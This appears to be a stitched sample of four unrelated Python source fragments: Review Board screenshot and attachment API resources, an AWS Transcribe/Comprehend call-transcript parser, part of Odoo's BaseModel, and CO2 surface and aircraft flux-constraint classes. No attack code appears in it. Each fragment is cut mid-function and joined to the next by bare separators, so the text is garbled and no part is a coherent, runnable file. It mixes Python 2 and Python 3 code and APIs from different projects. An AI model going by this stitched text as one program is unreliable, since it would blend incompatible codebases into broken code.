return obj.image.name
def serialize_url_field(self, obj):
return obj.image.url
def serialize_thumbnail_url_field(self, obj):
return obj.get_thumbnail_url()
def serialize_caption_field(self, obj):
# We prefer 'caption' here, because when creating a new screenshot, it
# won't be full of data yet (and since we're posting to screenshots/,
# it doesn't hit DraftScreenshotResource). DraftScreenshotResource will
# prefer draft_caption, in case people are changing an existing one.
return obj.caption or obj.draft_caption
@webapi_check_local_site
@webapi_login_required
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED,
INVALID_FORM_DATA)
@webapi_request_fields(
required={
'path': {
'type': file,
'description': 'The screenshot to upload.',
},
},
optional={
'caption': {
'type': str,
'description': 'The optional caption describing the '
'screenshot.',
},
},
)
def create(self, request, *args, **kwargs):
"""Creates a new screenshot from an uploaded file.
This accepts any standard image format (PNG, GIF, JPEG) and associates
it with a draft of a review request.
It is expected that the client will send the data as part of a
:mimetype:`multipart/form-data` mimetype. The screenshot's name
and content should be stored in the ``path`` field. A typical request
may look like::
-- SoMe BoUnDaRy
Content-Disposition: form-data; name=path; filename="foo.png"
<PNG content here>
-- SoMe BoUnDaRy --
"""
try:
review_request = \
review_request_resource.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not review_request.is_mutable_by(request.user):
return _no_access_error(request.user)
form_data = request.POST.copy()
form = UploadScreenshotForm(form_data, request.FILES)
if not form.is_valid():
return INVALID_FORM_DATA, {
'fields': _get_form_errors(form),
}
try:
screenshot = form.create(request.FILES['path'], review_request)
except ValueError, e:
return INVALID_FORM_DATA, {
'fields': {
'path': [str(e)],
},
}
return 201, {
self.item_result_key: screenshot,
}
@webapi_check_local_site
@webapi_login_required
@webapi_request_fields(
optional={
'caption': {
'type': str,
'description': 'The new caption for the screenshot.',
},
}
)
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED)
def update(self, request, caption=None, *args, **kwargs):
"""Updates the screenshot's data.
This allows updating the screenshot in a draft. The caption, currently,
is the only thing that can be updated.
"""
try:
review_request = \
review_request_resource.get_object(request, *args, **kwargs)
screenshot = screenshot_resource.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not review_request.is_mutable_by(request.user):
return _no_access_error(request.user)
try:
review_request_draft_resource.prepare_draft(request,
review_request)
except PermissionDenied:
return _no_access_error(request.user)
screenshot.draft_caption = caption
screenshot.save()
return 200, {
self.item_result_key: screenshot,
}
@webapi_check_local_site
@webapi_login_required
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED)
def delete(self, request, *args, **kwargs):
try:
review_request = \
review_request_resource.get_object(request, *args, **kwargs)
screenshot = screenshot_resource.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
try:
draft = review_request_draft_resource.prepare_draft(request,
review_request)
except PermissionDenied:
return _no_access_error(request.user)
draft.screenshots.remove(screenshot)
draft.inactive_screenshots.add(screenshot)
draft.save()
return 204, {}
class DraftScreenshotResource(BaseScreenshotResource):
"""Provides information on new screenshots being added to a draft of
a review request.
These are screenshots that will be shown once the pending review request
draft is published.
"""
name = 'draft_screenshot'
uri_name = 'screenshots'
model_parent_key = 'drafts'
allowed_methods = ('GET', 'DELETE', 'POST', 'PUT',)
def get_queryset(self, request, review_request_id, *args, **kwargs):
try:
draft = review_request_draft_resource.get_object(
request, review_request_id, *args, **kwargs)
inactive_ids = \
draft.inactive_screenshots.values_list('pk', flat=True)
q = Q(review_request=review_request_id) | Q(drafts=draft)
query = self.model.objects.filter(q)
query = query.exclude(pk__in=inactive_ids)
return query
except ObjectDoesNotExist:
return self.model.objects.none()
def serialize_caption_field(self, obj):
return obj.draft_caption or obj.caption
@webapi_check_local_site
@webapi_login_required
@augment_method_from(WebAPIResource)
def get(self, *args, **kwargs):
pass
@webapi_check_local_site
@webapi_login_required
@augment_method_from(WebAPIResource)
def delete(self, *args, **kwargs):
"""Deletes the screenshot from the draft.
This will remove the screenshot from the draft review request.
This cannot be undone.
This can be used to remove old screenshots that were previously
shown, as well as newly added screenshots that were part of the
draft.
Instead of a payload response on success, this will return :http:`204`.
"""
pass
@webapi_check_local_site
@webapi_login_required
@augment_method_from(WebAPIResource)
def get_list(self, *args, **kwargs):
"""Returns a list of draft screenshots.
Each screenshot in this list is an uploaded screenshot that will
be shown in the final review request. These may include newly
uploaded screenshots or screenshots that were already part of the
existing review request. In the latter case, existing screenshots
are shown so that their captions can be added.
"""
pass
def _get_list_impl(self, request, *args, **kwargs):
"""Returns the list of screenshots on this draft.
This is a specialized version of the standard get_list function
that uses this resource to serialize the children, in order to
guarantee that we'll be able to identify them as screenshots that are
part of the draft.
"""
return WebAPIResponsePaginated(
request,
queryset=self.get_queryset(request, is_list=True,
*args, **kwargs),
results_key=self.list_result_key,
serialize_object_func=
lambda obj: self.serialize_object(obj, request=request,
*args, **kwargs),
extra_data={
'links': self.get_links(self.list_child_resources,
request=request, *args, **kwargs),
},
**self.build_response_args(request))
draft_screenshot_resource = DraftScreenshotResource()
class BaseFileAttachmentResource(WebAPIResource):
"""A base resource representing file attachments."""
model = FileAttachment
name = 'file_attachment'
fields = {
'id': {
'type': int,
'description': | |
segment
if (nextSpeaker != lastSpeaker) or ((nextSpeaker == lastSpeaker) and ((nextStartTime - lastEndTime) > 0.1)):
nextSpeechSegment = SpeechSegment()
speechSegmentList.append(nextSpeechSegment)
nextSpeechSegment.segmentStartTime = nextStartTime
nextSpeechSegment.segmentSpeaker = nextSpeaker
skipLeadingSpace = True
confidenceList = []
nextSpeechSegment.segmentConfidence = confidenceList
nextSpeechSegment.segmentEndTime = nextEndTime
# Note the speaker and end time of this segment for the next iteration
lastSpeaker = nextSpeaker
lastEndTime = nextEndTime
# Get the word with the highest confidence
pronunciations = list(filter(lambda x: x["type"] == "pronunciation", channel["items"]))
word_result = list(filter(lambda x: x["start_time"] == word["start_time"] and x["end_time"] == word["end_time"], pronunciations))
try:
result = sorted(word_result[-1]["alternatives"], key=lambda x: x["confidence"])[-1]
confidence = float(result["confidence"])
except:
result = word_result[-1]["alternatives"][0]
confidence = float(result["redactions"][0]["confidence"])
# If we're doing simple entities then track which entities have been seen so far
if self.simpleEntityMap != {}:
checkTerm = result["content"].lower()
if checkTerm in self.simpleEntityMap:
self.matchedSimpleEntities[checkTerm] = self.simpleEntityMap[checkTerm]
# Write the word, and a leading space if this isn't the start of the segment
if (skipLeadingSpace):
skipLeadingSpace = False
wordToAdd = result["content"]
else:
wordToAdd = " " + result["content"]
# If the next item is punctuation, add it to the current word
try:
word_result_index = channel["items"].index(word_result[0])
next_item = channel["items"][word_result_index + 1]
if next_item["type"] == "punctuation":
wordToAdd += next_item["alternatives"][0]["content"]
except IndexError:
pass
# Add word and confidence to the segment and to our overall stats
nextSpeechSegment.segmentText += wordToAdd
confidenceList.append({"Text": wordToAdd, "Confidence": confidence,
"StartTime": float(word["start_time"]), "EndTime": float(word["end_time"])})
self.numWordsParsed += 1
self.cummulativeWordAccuracy += confidence
# Sort the segments, as they are in channel-order and not speaker-order, then
# merge together turns from the same speaker that are very close together
speechSegmentList = sorted(speechSegmentList, key=lambda segment: segment.segmentStartTime)
speechSegmentList = self.mergeSpeakerSegments(speechSegmentList)
# Inject sentiments into the segment list
self.performComprehendNLP(speechSegmentList)
# If we ended up with any matched simple entities then insert
# them, which we can now do as we now have the sentence order
if self.matchedSimpleEntities != {}:
self.createSimpleEntityEntries(speechSegmentList)
# Now set the overall call duration if we actually had any speech
if len(speechSegmentList) > 0:
self.duration = float(speechSegmentList[-1].segmentConfidence[-1]["EndTime"])
# Return our full turn-by-turn speaker segment list with sentiment
return speechSegmentList
def createSimpleEntityEntries(self, speechSegments):
"""
Searches through the speech segments given and updates them with any of the simple entity mapping
entries that we've found. It also updates the line-level items. Both methods simulate the same
response that we'd generate if this was via Standard or Custom Comprehend Entities
"""
# Loop through each segment looking for matches in our cut-down entity list
for entity in self.matchedSimpleEntities:
# Start by recording this in the header
entityEntry = self.matchedSimpleEntities[entity]
self.updateHeaderEntityCount(entityEntry["Type"], entityEntry["Original"])
# Work through each segment
for segment in speechSegments:
# Stop if the entity chars appear somewhere
if entity in segment.segmentText.lower():
# Now find the right spot in the segment (if any) and insert that entry
offsetStart = 0
for wordEntry in segment.segmentConfidence:
nextWord = wordEntry["Text"].lower().strip(" ,?.")
offsetEnd = offsetStart + len(wordEntry["Text"])
if entity == nextWord:
# Got a match - add this one on
newLineEntity = {}
newLineEntity["Score"] = 1.0
newLineEntity["Type"] = entityEntry["Type"]
newLineEntity["Text"] = wordEntry["Text"].strip(" ,?.")
newLineEntity["BeginOffset"] = offsetStart
newLineEntity["EndOffset"] = offsetEnd
segment.segmentCustomEntities.append(newLineEntity)
offsetStart = offsetEnd
def calculateTranscribeConversationTime(self, filename):
'''
Tries to work out the conversation time based upon patterns in the filename. Currently,
the POC customer has this format - 0a.93.a0.3e.00.00-09.25.51.067-09-26-2019.wav, but there
may be others, and hence this may need to be a plug-in per customer or something later. If
we cannot generate a time then the system later defaults to the current
'''
try:
# Filename = 0a.93.a0.3e.00.00-09.25.51.067-09-26-2019.wav
match = re.search('\d{2}.\d{2}.\d{2}.\d{3}-\d{2}-\d{2}-\d{4}', filename)
self.conversationTime = str(datetime.strptime(match.group(), '%H.%M.%S.%f-%m-%d-%Y'))
self.conversationLocation = cf.appConfig[cf.CONF_CONVO_LOCATION]
except:
# If everything fails system will use "now" as the datetime in UTC
self.conversationLocation = "Etc/UTC"
def loadSimpleEntityStringMap(self):
"""
Loads in any defined simple entity map for later use - this must be a CSV file, but it will be defined
without a language code. We will append the Comprehend language code to the filename and use that,
as that will give us multi-language coverage with a single file.
Example: Configured File = entityFile.csv -> Processed File for en-US audio = entityFile-en.csv
"""
if self.simpleEntityMatchingUsed:
# First, need to build up the real filename to use for this language. If we don't
# have a language (unlikely) then just try to use the base filename as a last resort
key = cf.appConfig[cf.CONF_ENTITY_FILE]
if (self.comprehendLanguageCode != ""):
key = key.split('.csv')[0] + "-" + self.comprehendLanguageCode + ".csv"
# Then check that the language-specific mapping file actually exists
s3 = boto3.client("s3")
bucket = cf.appConfig[cf.CONF_SUPPORT_BUCKET]
try:
response = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
# Mapping file doesn't exist, so just quietly exit but log something
print("ERROR: Configured simple entity file {} in bucket {} does not exist - entity detection not possible".format(key, bucket))
self.simpleEntityMatchingUsed = False
return
# Go download the mapping file and get it into a structure
mapFilepath = TMP_DIR + '/' + cf.appConfig[cf.CONF_ENTITY_FILE]
s3.download_file(bucket, key, mapFilepath)
reader = csv.DictReader(open(mapFilepath, errors="ignore"))
try:
for row in reader:
origTerm = row.pop("Text")
checkTerm = origTerm.lower()
if not (checkTerm in self.simpleEntityMap):
self.simpleEntityMap[checkTerm] = { "Type": row.pop("Type"), "Original": origTerm }
except Exception as e:
print(e)
def createPlaybackMP3Audio(self):
"""
Creates and MP3-version of the audio file used in the Transcribe job, as the HTML5 <audio> playback
controller cannot play them back if they are GSM-encoded 8Khz WAV files. Still need to work out how
to check for then encoding type via FFMPEG, but we do get the other info from Transcribe.
Note - if the source audio is in a bucket that isn't the standard one, e.g. it's the alternate location,
then the audio is always transcoded, as the UI may not have access to that bucket for playback
"""
# Get some info on the audio file before continuing
s3Object = urlparse(self.transcribeJobInfo["Media"]["MediaFileUri"])
bucket = s3Object.netloc
# 8Khz WAV or non-standard bucket audio gets converted
if (bucket != cf.appConfig[cf.CONF_S3BUCKET_INPUT]) or\
((self.transcribeJobInfo["MediaFormat"] == "wav") and (self.transcribeJobInfo["MediaSampleRateHertz"] == 8000)):
# First, we need to download the original audio file
fileObject = s3Object.path.lstrip('/')
inputFilename = TMP_DIR + '/' + fileObject.split('/')[-1]
outputFilename = inputFilename.split('.wav')[0] + '.mp3'
s3Client = boto3.client('s3')
s3Client.download_file(bucket, fileObject, inputFilename)
# Transform the file via FFMPEG - this will exception if not installed
try:
# Just convert from source to destination format
subprocess.call(['ffmpeg', '-nostats', '-loglevel', '0', '-y', '-i', inputFilename, outputFilename], stdin=subprocess.DEVNULL)
# Now upload the output file to the configured playback folder in the main input bucket
s3FileKey = cf.appConfig[cf.CONF_PREFIX_MP3_PLAYBACK] + '/' + outputFilename.split('/')[-1]
s3Client.upload_file(outputFilename, cf.appConfig[cf.CONF_S3BUCKET_INPUT], s3FileKey,
ExtraArgs={'ContentType': 'audio/mp3'})
self.audioPlaybackUri = "s3://" + cf.appConfig[cf.CONF_S3BUCKET_INPUT] + "/" + s3FileKey
except Exception as e:
print(e)
print("Unable to create MP3 version of original audio file - could not find FFMPEG libraries")
def parseTranscribeFile(self, transcribeJob):
"""
Parses the output from the specified Transcribe job
"""
# Load in the Amazon Transcribe job header information, ensuring that the job has completed
transcribe = boto3.client("transcribe")
try:
self.transcribeJobInfo = transcribe.get_transcription_job(TranscriptionJobName = transcribeJob)["TranscriptionJob"]
assert self.transcribeJobInfo["TranscriptionJobStatus"] == "COMPLETED", f"Transcription job '{transcribeJob}' has not yet completed."
except transcribe.exceptions.BadRequestException:
assert False, f"Unable to load information for Transcribe job named '{transcribeJob}'."
# Create an MP3 playback file if we have to
self.createPlaybackMP3Audio()
# Pick out the config parameters that we need
outputS3Bucket = cf.appConfig[cf.CONF_S3BUCKET_OUTPUT]
outputS3Key = cf.appConfig[cf.CONF_PREFIX_PARSED_RESULTS]
# Work out the conversation time and set the language code
self.calculateTranscribeConversationTime(transcribeJob)
self.setComprehendLanguageCode(self.transcribeJobInfo["LanguageCode"])
# Download the job JSON results file to a local temp file - redacted if the job used it
# if self.transcribeJobInfo["ContentRedaction"]:
if "ContentRedaction" in self.transcribeJobInfo:
uri = self.transcribeJobInfo["Transcript"]["RedactedTranscriptFileUri"]
else:
uri = self.transcribeJobInfo["Transcript"]["TranscriptFileUri"]
offset = uri.find(outputS3Bucket) + len(outputS3Bucket) + 1
self.jsonOutputFilename = uri[offset:]
jsonFilepath = TMP_DIR + '/' + self.jsonOutputFilename
s3Client = boto3.client('s3')
# Now download - this has been known to get a "404 HeadObject Not Found",
# which makes no sense, so if that happens then re-try in a sec. Only once.
try:
s3Client.download_file(outputS3Bucket, self.jsonOutputFilename, jsonFilepath)
except:
time.sleep(3)
s3Client.download_file(outputS3Bucket, self.jsonOutputFilename, jsonFilepath)
# Before we process, let's load up any required simply entity map
self.loadSimpleEntityStringMap()
# | |
for ID field
_sql_constraints = [] #: SQL constraints [(name, sql_def, message)]
_rec_name = None #: field to use for labeling records, default: ``name``
_order = 'id' #: default order field for searching results
_parent_name = 'parent_id' #: the many2one field used as parent field
_parent_store = False
"""set to True to compute parent_path field.
Alongside a :attr:`~.parent_path` field, sets up an indexed storage
of the tree structure of records, to enable faster hierarchical queries
on the records of the current model using the ``child_of`` and
``parent_of`` domain operators.
"""
_active_name = None #: field to use for active records
_date_name = 'date' #: field to use for default calendar view
_fold_name = 'fold' #: field to determine folded groups in kanban views
_needaction = False # whether the model supports "need actions" (Old API)
_translate = True # False disables translations export for this model (Old API)
_check_company_auto = False
"""On write and create, call ``_check_company`` to ensure companies
consistency on the relational fields having ``check_company=True``
as attribute.
"""
_depends = {}
"""dependencies of models backed up by SQL views
``{model_name: field_names}``, where ``field_names`` is an iterable.
This is only used to determine the changes to flush to database before
executing ``search()`` or ``read_group()``. It won't be used for cache
invalidation or recomputing fields.
"""
# default values for _transient_vacuum()
_transient_max_count = lazy_classproperty(lambda _: config.get('osv_memory_count_limit'))
_transient_max_hours = lazy_classproperty(lambda _: config.get('transient_age_limit'))
CONCURRENCY_CHECK_FIELD = '__last_update'
@api.model
def view_init(self, fields_list):
""" Override this method to do specific things when a form view is
opened. This method is invoked by :meth:`~default_get`.
"""
pass
def _valid_field_parameter(self, field, name):
""" Return whether the given parameter name is valid for the field. """
return name == 'related_sudo'
@api.model
def _add_field(self, name, field):
""" Add the given ``field`` under the given ``name`` in the class """
cls = type(self)
# add field as an attribute and in cls._fields (for reflection)
if not isinstance(getattr(cls, name, field), Field):
_logger.warning("In model %r, field %r overriding existing value", cls._name, name)
setattr(cls, name, field)
cls._fields[name] = field
# basic setup of field
field.setup_base(self, name)
@api.model
def _pop_field(self, name):
""" Remove the field with the given ``name`` from the model.
This method should only be used for manual fields.
"""
cls = type(self)
field = cls._fields.pop(name, None)
if hasattr(cls, name):
delattr(cls, name)
if cls._rec_name == name:
# fixup _rec_name and display_name's dependencies
cls._rec_name = None
cls.display_name.depends = tuple(dep for dep in cls.display_name.depends if dep != name)
return field
@api.model
def _add_magic_fields(self):
""" Introduce magic fields on the current class
* id is a "normal" field (with a specific getter)
* create_uid, create_date, write_uid and write_date have become
"normal" fields
* $CONCURRENCY_CHECK_FIELD is a computed field with its computing
method defined dynamically. Uses ``str(datetime.datetime.utcnow())``
to get the same structure as the previous
``(now() at time zone 'UTC')::timestamp``::
# select (now() at time zone 'UTC')::timestamp;
timezone
----------------------------
2013-06-18 08:30:37.292809
>>> str(datetime.datetime.utcnow())
'2013-06-18 08:31:32.821177'
"""
def add(name, field):
""" add ``field`` with the given ``name`` if it does not exist yet """
if name not in self._fields:
self._add_field(name, field)
# cyclic import
from . import fields
# this field 'id' must override any other column or field
self._add_field('id', fields.Id(automatic=True))
add('display_name', fields.Char(string='Display Name', automatic=True,
compute='_compute_display_name'))
if self._log_access:
add('create_uid', fields.Many2one(
'res.users', string='Created by', automatic=True, readonly=True))
add('create_date', fields.Datetime(
string='Created on', automatic=True, readonly=True))
add('write_uid', fields.Many2one(
'res.users', string='Last Updated by', automatic=True, readonly=True))
add('write_date', fields.Datetime(
string='Last Updated on', automatic=True, readonly=True))
last_modified_name = 'compute_concurrency_field_with_access'
else:
last_modified_name = 'compute_concurrency_field'
# this field must override any other column or field
self._add_field(self.CONCURRENCY_CHECK_FIELD, fields.Datetime(
string='Last Modified on', compute=last_modified_name,
compute_sudo=False, automatic=True))
def compute_concurrency_field(self):
for record in self:
record[self.CONCURRENCY_CHECK_FIELD] = odoo.fields.Datetime.now()
@api.depends('create_date', 'write_date')
def compute_concurrency_field_with_access(self):
for record in self:
record[self.CONCURRENCY_CHECK_FIELD] = \
record.write_date or record.create_date or odoo.fields.Datetime.now()
#
# Goal: try to apply inheritance at the instantiation level and
# put objects in the pool var
#
@classmethod
def _build_model(cls, pool, cr):
""" Instantiate a given model in the registry.
This method creates or extends a "registry" class for the given model.
This "registry" class carries inferred model metadata, and inherits (in
the Python sense) from all classes that define the model, and possibly
other registry classes.
"""
# In the simplest case, the model's registry class inherits from cls and
# the other classes that define the model in a flat hierarchy. The
# registry contains the instance ``model`` (on the left). Its class,
# ``ModelClass``, carries inferred metadata that is shared between all
# the model's instances for this registry only.
#
# class A1(Model): Model
# _name = 'a' / | \
# A3 A2 A1
# class A2(Model): \ | /
# _inherit = 'a' ModelClass
# / \
# class A3(Model): model recordset
# _inherit = 'a'
#
# When a model is extended by '_inherit', its base classes are modified
# to include the current class and the other inherited model classes.
# Note that we actually inherit from other ``ModelClass``, so that
# extensions to an inherited model are immediately visible in the
# current model class, like in the following example:
#
# class A1(Model):
# _name = 'a' Model
# / / \ \
# class B1(Model): / A2 A1 \
# _name = 'b' / \ / \
# B2 ModelA B1
# class B2(Model): \ | /
# _name = 'b' \ | /
# _inherit = ['a', 'b'] \ | /
# ModelB
# class A2(Model):
# _inherit = 'a'
if getattr(cls, '_constraints', None):
_logger.warning("Model attribute '_constraints' is no longer supported, "
"please use @api.constrains on methods instead.")
# Keep links to non-inherited constraints in cls; this is useful for
# instance when exporting translations
cls._local_sql_constraints = cls.__dict__.get('_sql_constraints', [])
# determine inherited models
parents = cls._inherit
parents = [parents] if isinstance(parents, str) else (parents or [])
# determine the model's name
name = cls._name or (len(parents) == 1 and parents[0]) or cls.__name__
# all models except 'base' implicitly inherit from 'base'
if name != 'base':
parents = list(parents) + ['base']
# create or retrieve the model's class
if name in parents:
if name not in pool:
raise TypeError("Model %r does not exist in registry." % name)
ModelClass = pool[name]
ModelClass._build_model_check_base(cls)
check_parent = ModelClass._build_model_check_parent
else:
ModelClass = type(name, (BaseModel,), {
'_name': name,
'_register': False,
'_original_module': cls._module,
'_inherit_module': dict(), # map parent to introducing module
'_inherit_children': OrderedSet(), # names of children models
'_inherits_children': set(), # names of children models
'_fields': OrderedDict(), # populated in _setup_base()
})
check_parent = cls._build_model_check_parent
# determine all the classes the model should inherit from
bases = LastOrderedSet([cls])
for parent in parents:
if parent not in pool:
raise TypeError("Model %r inherits from non-existing model %r." % (name, parent))
parent_class = pool[parent]
if parent == name:
for base in parent_class.__bases__:
bases.add(base)
else:
check_parent(cls, parent_class)
bases.add(parent_class)
ModelClass._inherit_module[parent] = cls._module
parent_class._inherit_children.add(name)
ModelClass.__bases__ = tuple(bases)
# determine the attributes of the model's class
ModelClass._build_model_attributes(pool)
check_pg_name(ModelClass._table)
# Transience
if ModelClass._transient:
assert ModelClass._log_access, \
"TransientModels must have log_access turned on, " \
"in order to implement their vacuum policy"
# link the class to the registry, and update the registry
ModelClass.pool = pool
pool[name] = ModelClass
# backward compatibility: instantiate the model, and initialize it
model = object.__new__(ModelClass)
model.__init__(pool, cr)
return ModelClass
@classmethod
def _build_model_check_base(model_class, cls):
""" Check whether ``model_class`` can be extended with ``cls``. """
if model_class._abstract and not cls._abstract:
msg = ("%s transforms the abstract model %r into a non-abstract model. "
"That class should either inherit from AbstractModel, or set a different '_name'.")
raise TypeError(msg % (cls, model_class._name))
if model_class._transient != cls._transient:
if model_class._transient:
msg = ("%s transforms the transient model %r into a non-transient model. "
"That class should either inherit from TransientModel, or set a different '_name'.")
else:
msg = ("%s transforms the model %r into a transient model. "
"That class should either inherit from | |
models = df.model.values
model_families = get_model_families()
family_counts = {k: 0 for k in set(model_families.values())}
for m in models:
family = model_families[m]
family_counts[family] += 1
wgts = []
for m in models:
family = model_families[m]
wgts.append(1./family_counts[family])
xerr = wgts
yerr = wgts
fit_xy = regression_models.linreg_odr(x[~k], y[~k], xerr=xerr, yerr=yerr)
fit_yx = regression_models.linreg_odr(y[~k], x[~k], xerr=yerr, yerr=xerr)
fit_dict = {f'fit_{k}': v for k, v in fit_xy.to_dict().items()}
fit_dict.update({f'yxfit_{k}': v for k, v in fit_yx.to_dict().items()})
return fit_dict
def get_fit_dict(series, prefix=''):
"""
Pull out all columns starting with "fit_" from pd.Series.
"""
assert isinstance(series, pd.core.series.Series), (
'fit_dict: require series'
)
if prefix:
return {
k.split(f'{prefix}fit_')[-1]: v
for k, v in series.items() if f'{prefix}fit_' in k
}
else:
return {
k.split(f'fit_')[-1]: v
for k, v in series.items() if f'fit_' in k and 'yxfit' not in k
}
class surface_constraint(object):
"""This object computes the emergent flux constraint based on surface data.
Parameters
----------
periods : list of tuples
A list of tuples with year ranges over which to compute the constraint; e.g.
[(1999, 2020), (1999, 2009), (2009, 2020)].
flux_lat_range: [float, float]
The latitude range over which to integrate fluxes.
weight_by_sd_iav : boolean
Use a weighted regression to estimate constraint relationship, with the weights set by the
standard deviation of interannual variability.
seasons : list
The seasons over which to compute the constraint. E.g. ["DJF", "JJA"].
fit_period: string
The year-range in `periods` to use as the "calibrated" constraint. E.g., "1999-2020".
das_srf: dict
Dictionary of observational data contained in pandas.DataFrame's returned from `load_data_surface`.
model_tracer_list: list of tuples
The models and their tracers to use, i.e. [(CT2017, "CO2_OCN"), (CT2019B, "CO2_OCN"), ...]
model_tracer_ext_list : list of tuples
A list of tuples specifying the (model, tracer) pairs to use to estimate "external"
contributions to the observed gradient. I.e., these data are used to correct the
observed estimates of the gradient for land and fossil contributions.
model_list_sfco2_lnd : list of tuples
A list of (model, tracer) pairs used to correct the resulting flux estimate for in-region
land and fossil fuel fluxes. This is only used if the contraint is based on total CO2.
"""
def __init__(self,
periods,
flux_lat_range,
weight_by_sd_iav,
seasons,
fit_period,
das_srf,
model_tracer_list,
model_list_sfco2_lnd=[],
model_tracer_ext_list=None,
):
"""set up the object"""
# incoming parameters
self.periods = periods
self.flux_lat_range = flux_lat_range
self.weight_by_sd_iav = weight_by_sd_iav
self.seasons = seasons
self.fit_period = fit_period
self.model_tracer_list = model_tracer_list
self.model_tracer_ext_list = model_tracer_ext_list
self.model_list_sfco2_lnd = model_list_sfco2_lnd
assert fit_period in [self.period_str(p) for p in periods], (
'`fit_period` must be in periods'
)
# compute gradients
self.hg_obs = self._compute_surface_gradient(das_srf['obs-CO2'])
self._compute_monthly_gradients(das_srf)
# get fluxes
dsets_fluxes = get_dset_fluxes(self.model_tracer_list, self.flux_lat_range)
dsets_fluxes_mmm = get_dset_fluxes_mmm(dsets_fluxes)
df_data, df_fits = self._compute_surface_constraint(
das_srf, dsets_fluxes_mmm,
)
self.df_data = df_data
self.df_fits = df_fits
self._surface_flux = None
self._p_pcov = None
def _compute_surface_gradient(self, das_srf_obs):
lines = []
for period in self.periods:
for season in self.seasons:
obs_gradient_mean, obs_gradient_std = surface_obs_gradient(
das_srf_obs, season, slice(period[0], period[1])
)
lines.append(dict(
period=self.period_str(period),
season=season,
gradient_mean=obs_gradient_mean,
gradient_std=obs_gradient_std,
)
)
return pd.DataFrame(lines).set_index(['period', 'season'])
def _compute_monthly_gradients(self, das_srf):
"""compute all the compontents of the surface constraint"""
lines = []
model_tracer_list = [('obs', 'CO2')] + ensure_components(
self.model_tracer_list + self.model_tracer_ext_list
)
for month in range(1, 13):
for model, tracer in model_tracer_list:
key = f'{model}-{tracer}'
if key not in das_srf:
print(f'missing {key}, cannot compute monthly gradient')
continue
ds_grad = obs_surface.compute_DCO2y(das_srf[key], month)
for period in self.periods:
gradient = ds_grad.sel(time=slice(period[0], period[1])).CO2
result = dict(
model=model,
tracer=tracer,
period=self.period_str(period),
month=month,
season=get_season(month),
time_bounds=period,
gradient=np.float(gradient.mean('time').values),
gradient_std=np.float(gradient.std('time').values),
)
lines.append(result)
self.df_gradients_mon = pd.DataFrame(lines).set_index(
['model', 'tracer', 'period', 'month',]
)
def _compute_surface_constraint(self, das_srf, dsets_fluxes_mmm):
"""compute all the compontents of the surface constraint"""
df_list = []
lines = []
for period in self.periods:
for season in self.seasons:
df = surface_flux_v_gradient(das_srf, dsets_fluxes_mmm[season],
season, slice(period[0], period[1]),
self.model_tracer_list,
)
df['time_bounds'] = [period]*len(df)
df['period'] = [self.period_str(period)]*len(df)
df['season'] = season
df_list.append(df)
result = dict(
season=season, period=self.period_str(period), time=np.mean(period)
)
result.update(
compute_constraint_fit(df, weight_by_sd_iav=self.weight_by_sd_iav)
)
lines.append(result)
df_srf = pd.concat(df_list).set_index(['period', 'season', 'model', 'field'])
df_fits_srf = pd.DataFrame(lines).set_index(['period', 'season'])
return df_srf, df_fits_srf
@property
def surface_flux(self):
"""Return a pandas.DataFrame with the surface flux estimates for each time
range defined in `periods`.
"""
if self._surface_flux is None:
self._surface_flux = self._compute_surface_flux()
return self._surface_flux
def _compute_surface_flux(self):
flux_land = None
flux_land_std = None
if self.model_tracer_ext_list:
df_ext = util.pd_xs_list(self.df_gradients_mon, self.model_tracer_ext_list,
level=('model', 'tracer'))
series_ext_grad = (df_ext
.groupby(['model', 'period', 'season'])
.mean()
.groupby(['period', 'season'])
.gradient.mean()
)
series_ext_grad_std = (df_ext
.groupby(['model', 'period', 'season'])
.mean()
.groupby(['period', 'season'])
.gradient.std()
)
lines = []
for season in self.seasons:
if self.model_list_sfco2_lnd:
ds_sfco2_lnd = get_dset_fluxes_land(
self.flux_lat_range, self.model_list_sfco2_lnd, season_avg=True)[season]
for period in self.periods:
obs_gradient_mean, obs_gradient_std = self.hg_obs.loc[(self.period_str(period), season)]
ext_gradient_mean = 0.
ext_gradient_std = 0.
if self.model_tracer_ext_list:
ext_gradient_mean = series_ext_grad.loc[(self.period_str(period), season)]
ext_gradient_std = series_ext_grad_std.loc[(self.period_str(period), season)]
corrected_gradient_mean = obs_gradient_mean - ext_gradient_mean
corrected_gradient_std = np.sqrt(obs_gradient_std**2 + ext_gradient_std**2)
if self.model_list_sfco2_lnd:
da = ds_sfco2_lnd.FLUX.sel(time=slice(period[0], period[1])).mean('time')
flux_land = np.float(da.mean('model').values)
flux_land_std = np.float(da.std('model').values)
fit_dict = get_fit_dict(self.df_fits.loc[self.fit_period, season])
flux_nocorr, flux_error_nocorr = estimate_flux(
fit_dict, obs_gradient_mean, obs_gradient_std,
)
flux, flux_error = estimate_flux(
fit_dict, corrected_gradient_mean, corrected_gradient_std,
flux_land, flux_land_std,
)
lines.append(dict(
period=self.period_str(period),
season=season,
time_bnds=period,
obs_grad=obs_gradient_mean,
obs_grad_err=obs_gradient_std,
corrected_grad=corrected_gradient_mean,
corrected_grad_err=corrected_gradient_std,
flux=flux,
flux_error=flux_error,
flux_land=flux_land,
flux_land_error=flux_land_std,
flux_uncorrected=flux_nocorr,
flux_error_uncorrected=flux_error_nocorr,
))
return pd.DataFrame(lines).set_index(['period', 'season'])
def period_str(self, y1_y2):
return '-'.join([f'{y:04d}' for y in y1_y2])
class aircraft_constraint(object):
"""This object computes the aircraft constraint.
This is what happens here:
1. Initialize object with parameters defining the computation;
2. Compute observed gradient and error estimate from campaigns;
3. Group campaigns into `fit_groups` and compute associated DataFrame;
4. Compute fluxes for each campaign based on the associated `fit_group`
5. Fit a harmonic function to the campaign flux estimates, use this fit to generate an
annual mean estimate with associated uncertainty.
Parameters
----------
ubin : float
The value of θ on which to center the upper bin.
lbin : float
The value of θ on which to center the lower bin.
udθ : float
The width in θ units of the upper bin.
ldθ : float
The width in θ units of the lower bin.
gradient_lat_range : [float, float]
The latitude range over which to compute the vertical gradient.
flux_memory: float
The time in days over which to average air-sea fluxes in the calculation.
